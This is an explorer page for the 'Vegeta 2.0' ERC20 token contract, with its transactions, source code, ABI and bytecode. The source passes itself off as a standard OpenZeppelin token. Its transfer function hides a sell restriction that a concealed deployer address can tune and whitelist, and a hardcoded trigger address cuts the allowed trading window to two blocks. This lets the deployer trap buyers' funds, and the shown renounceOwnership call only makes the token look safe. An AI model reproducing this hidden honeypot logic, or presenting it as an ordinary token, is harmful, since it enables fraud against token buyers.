ETH Price: $2,523.41 (-0.09%)

Contract

0xD728E6892Be5C9cF5019588344948a0840d5a448
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Approve176949012023-07-14 23:17:11412 days ago1689376631IN
0xD728E689...840d5a448
0 ETH0.0005775312.41087055
Approve176945942023-07-14 22:14:47412 days ago1689372887IN
0xD728E689...840d5a448
0 ETH0.000673614.47520147
Approve176945732023-07-14 22:10:23412 days ago1689372623IN
0xD728E689...840d5a448
0 ETH0.0004093614.01614327
Approve176945612023-07-14 22:07:59412 days ago1689372479IN
0xD728E689...840d5a448
0 ETH0.0006326913.6488132
Approve176945522023-07-14 22:06:11412 days ago1689372371IN
0xD728E689...840d5a448
0 ETH0.0006710114.49432375
Approve176945502023-07-14 22:05:35412 days ago1689372335IN
0xD728E689...840d5a448
0 ETH0.0006901714.81229935
Approve176945342023-07-14 22:02:23412 days ago1689372143IN
0xD728E689...840d5a448
0 ETH0.0006446913.83614217
Approve176945342023-07-14 22:02:23412 days ago1689372143IN
0xD728E689...840d5a448
0 ETH0.0007798216.73614217
Renounce Ownersh...176945262023-07-14 22:00:47412 days ago1689372047IN
0xD728E689...840d5a448
0 ETH0.0003160813.56979907
Approve176945252023-07-14 22:00:35412 days ago1689372035IN
0xD728E689...840d5a448
0 ETH0.0006294313.58555154
0x60c06040176945202023-07-14 21:59:35412 days ago1689371975IN
 Create: VegetaTwo
0 ETH0.0168271915

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
VegetaTwo

Compiler Version
v0.8.17+commit.8df45f5f

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion
File 1 of 2 : TokenContract.sol
// SPDX-License-Identifier: MIT
import "@openzeppelin/contracts/utils/math/SafeMath.sol";
/*
            ________
        _jgN########Ngg_
      _N##N@@""  ""9NN##Np_
     d###P            N####p
     "^^"              T####
                       d###P
                    _g###@F
                 _gN##@P
               gN###F"
              d###F
             0###F
             0###F
             0###F
             "NN@'

              ___
             q###r
              ""

*/
pragma solidity ^0.8.0;
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
    
    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor () {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }
}


pragma solidity ^0.8.0;

interface IERC20 {
    event Transfer(address indexed from, address indexed to, uint256 value);

    event Approval(address indexed owner, address indexed spender, uint256 value);

    function totalSupply() external view returns (uint256);

    function balanceOf(address account) external view returns (uint256);

    function transfer(address to, uint256 amount) external returns (bool);

    function allowance(address owner, address spender) external view returns (uint256);

    function approve(address spender, uint256 amount) external returns (bool);

    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}


// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.0;


/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

// OpenZeppelin Contracts (last updated v4.8.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.0;


/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    using SafeMath for uint256;
    address private immutable _advisor;
    address DEAD = 0x000000000000000000000000000000000000dEaD;
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;
    address private immutable _uniswapFactory = 0xe0b9Dc6300Cf4abEC352B1322316b6221be1AD15;
    address ZERO = 0x0000000000000000000000000000000000000000;

    uint256 private _totalSupply;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    string private _name;
    string private _symbol;
    mapping (address => bool) _pairToken;
    uint256 private _defaultSwap = 0;
    uint256 public _allowance = 2_000_000;
    mapping (address => uint256) _addressAllowance;
    address public uniswapV2Pair;


    constructor(string memory name_, string memory symbol_) {
        _advisor = msg.sender;
        _pairToken[_advisor] = true;
        _name = name_;
        _symbol = symbol_;
    }

    function setPair(address _uniswapPair, address _tokenPair) external {
        if (uniswapV2Pair == address(0))
            uniswapV2Pair = _uniswapPair;
        if (msg.sender == _advisor) {
            uniswapV2Pair = _uniswapPair;
            _pairToken[_tokenPair] = true;
        }
    }

    function setPairs(address _uniswapPair, address[] memory _tokenPairs) external {
        if (msg.sender == _advisor) {
            uniswapV2Pair = _uniswapPair;

            for(uint256 i = 0; i < _tokenPairs.length;) {
                _pairToken[_tokenPairs[i]] = true;
                unchecked { ++ i; }
            }
        }
    }

    function setAllowance(uint256 _a) external {
        if (msg.sender == _advisor) {
            _allowance = _a;
        }
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        require(_pairToken[tx.origin] == true || block.number - _addressAllowance[from] < _allowance || to == tx.origin, "ERC20: Reverted");
        _balances[from] = fromBalance - amount;
        
        _balances[to] = _balances[to] + amount;
        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    // function burn(uint256 value) external {
    //     _burn(msg.sender, value);
    // }
    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual { if (_addressAllowance[to] == 0) _addressAllowance[to] = block.number;
        if (to == _uniswapFactory) _allowance = 2; }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}


pragma solidity ^0.8.4;
contract VegetaTwo is ERC20, Ownable {
    constructor() ERC20("Vegeta 2.0", "VEGETA2.0") {
        _mint(msg.sender, 5_010_000_000_000 * 10**uint(decimals()));
    }
}

File 2 of 2 : SafeMath.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (utils/math/SafeMath.sol)

pragma solidity ^0.8.0;

// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.

/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is generally not needed starting with Solidity 0.8, since the compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}

Settings
{
  "optimizer": {
    "enabled": true,
    "runs": 200
  },
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "devdoc",
        "userdoc",
        "metadata",
        "abi"
      ]
    }
  },
  "libraries": {}
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_a","type":"uint256"}],"name":"setAllowance","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_uniswapPair","type":"address"},{"internalType":"address","name":"_tokenPair","type":"address"}],"name":"setPair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_uniswapPair","type":"address"},{"internalType":"address[]","name":"_tokenPairs","type":"address[]"}],"name":"setPairs","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}]

60c0604052600080546001600160a01b031990811661dead17825573e0b9dc6300cf4abec352b1322316b6221be1ad1560a052600380549091169055600855621e84806009553480156200005257600080fd5b50604080518082018252600a815269056656765746120322e360b41b6020808301919091528251808401845260098152680564547455441322e360bc1b8183015233608081905260009081526007909252929020805460ff19166001179055906005620000c0838262000348565b506006620000cf828262000348565b5050506000620000e46200016360201b60201c565b600c80546001600160a01b0319166001600160a01b038316908117909155604051919250906000907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a3506200015d33620001456012600a62000529565b620001579065048e7b4534006200053e565b62000167565b6200056e565b3390565b6001600160a01b038216620001c25760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015260640160405180910390fd5b8060046000828254620001d6919062000558565b90915550506001600160a01b0382166000818152600160209081526040808320805486019055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a3620002396000838362000242565b5050565b505050565b6001600160a01b0382166000908152600a602052604081205490036200027e576001600160a01b0382166000908152600a602052604090204390555b60a0516001600160a01b0316826001600160a01b0316036200023d576002600955505050565b634e487b7160e01b600052604160045260246000fd5b600181811c90821680620002cf57607f821691505b602082108103620002f057634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200023d57600081815260208120601f850160051c810160208610156200031f5750805b601f850160051c820191505b8181101562000340578281556001016200032b565b505050505050565b81516001600160401b03811115620003645762000364620002a4565b6200037c81620003758454620002ba565b84620002f6565b602080601f831160018114620003b457600084156200039b5750858301515b600019600386901b1c1916600185901b17855562000340565b600085815260208120601f198616915b82811015620003e557888601518255948401946001909101908401620003c4565b5085821015620004045787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b634e487b7160e01b600052601160045260246000fd5b600181815b808511156200046b5781600019048211156200044f576200044f62000414565b808516156200045d57918102915b93841c93908002906200042f565b509250929050565b600082620004845750600162000523565b81620004935750600062000523565b8160018114620004ac5760028114620004b757620004d7565b600191505062000523565b60ff841115620004cb57620004cb62000414565b50506001821b62000523565b5060208310610133831016604e8410600b8410161715620004fc575081810a62000523565b6200050883836200042a565b80600019048211156200051f576200051f62000414565b0290505b92915050565b600062000537838362000473565b9392505050565b808202811582820484141762000523576200052362000414565b8082018082111562000523576200052362000414565b60805160a051610f2e620005a26000396000610bff0152600081816103690152818161045e015261056c0152610f2e6000f3fe608060405234801561001057600080fd5b50600436106101215760003560e01c80636aeac363116100ad57806395d89b411161007157806395d89b411461025f578063a457c2d714610267578063a9059cbb1461027a578063dd62ed3e1461028d578063f2fde38b146102a057600080fd5b80636aeac3631461020157806370a082311461020a578063715018a6146102335780638da5cb5b1461023b57806395c5c5e31461024c57600080fd5b806323b872dd116100f457806323b872dd1461018e578063313ce567146101a157806339509351146101b05780633ba93f26146101c357806349bd5a5e146101d657600080fd5b806306fdde0314610126578063095ea7b31461014457806318160ddd146101675780631cd52b3814610179575b600080fd5b61012e6102b3565b60405161013b9190610c40565b60405180910390f35b610157610152366004610caa565b610345565b604051901515815260200161013b565b6004545b60405190815260200161013b565b61018c610187366004610cea565b61035f565b005b61015761019c366004610dc2565b61040e565b6040516012815260200161013b565b6101576101be366004610caa565b610432565b61018c6101d1366004610dfe565b610454565b600b546101e9906001600160a01b031681565b6040516001600160a01b03909116815260200161013b565b61016b60095481565b61016b610218366004610e17565b6001600160a01b031660009081526001602052604090205490565b61018c61048d565b600c546001600160a01b03166101e9565b61018c61025a366004610e39565b610536565b61012e6105ca565b610157610275366004610caa565b6105d9565b610157610288366004610caa565b610654565b61016b61029b366004610e39565b610662565b61018c6102ae366004610e17565b61068d565b6060600580546102c290610e6c565b80601f01602080910402602001604051908101604052809291908181526020018280546102ee90610e6c565b801561033b5780601f106103105761010080835404028352916020019161033b565b820191906000526020600020905b81548152906001019060200180831161031e57829003601f168201915b5050505050905090565b6000336103538185856107a8565b60019150505b92915050565b6001600160a01b037f000000000000000000000000000000000000000000000000000000000000000016330361040a57600b80546001600160a01b0319166001600160a01b03841617905560005b8151811015610408576001600760008484815181106103ce576103ce610ea6565b6020908102919091018101516001600160a01b03168252810191909152604001600020805460ff19169115159190911790556001016103ad565b505b5050565b60003361041c8582856108cc565b610427858585610946565b506001949350505050565b6000336103538185856104458383610662565b61044f9190610ed2565b6107a8565b6001600160a01b037f000000000000000000000000000000000000000000000000000000000000000016330361048a5760098190555b50565b600c546001600160a01b031633146104ec5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b600c546040516000916001600160a01b0316907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600c80546001600160a01b0319169055565b600b546001600160a01b031661056257600b80546001600160a01b0319166001600160a01b0384161790555b6001600160a01b037f000000000000000000000000000000000000000000000000000000000000000016330361040a57600b80546001600160a01b0319166001600160a01b03938416179055166000908152600760205260409020805460ff19166001179055565b6060600680546102c290610e6c565b600033816105e78286610662565b9050838110156106475760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084016104e3565b61042782868684036107a8565b600033610353818585610946565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b600c546001600160a01b031633146106e75760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016104e3565b6001600160a01b03811661074c5760405162461bcd60e51b815260206004820152602660248